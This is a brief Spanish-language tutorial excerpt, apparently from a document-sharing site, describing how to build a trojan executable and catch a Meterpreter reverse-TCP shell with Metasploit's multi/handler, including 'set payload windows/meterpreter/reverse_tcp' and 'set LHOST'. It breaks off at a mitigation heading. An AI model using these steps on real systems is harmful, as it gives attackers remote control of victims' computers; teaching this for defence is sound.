Documentos de Académico
Documentos de Profesional
Documentos de Cultura
BACKDOOR
Con este comando creamos el troyano punto exe donde le especificamos el host
del atacante, el puerto por donde se va a conectar y definimos que la conexin que
realizamos para esto se utiliza reverse-tcp.
Ahora abrimos otra consola y escribimos el comando msfconsole.
Nos la consola msf donde encontramos muchos modulo pero para este ataque
utilizamos el mdulo multi/handler
Para completar este ataque tenemos que cambiar la configuracin de este modulo,
esto se hace con el comando set payload windows/meterpreter/reverse_tcp.
Despus ponemos nuestra direccin para eso aplicamos el comando set LHOST
(address)
MITIGACIN
Para poder mitigar este ataque tenemos varias recomendaciones: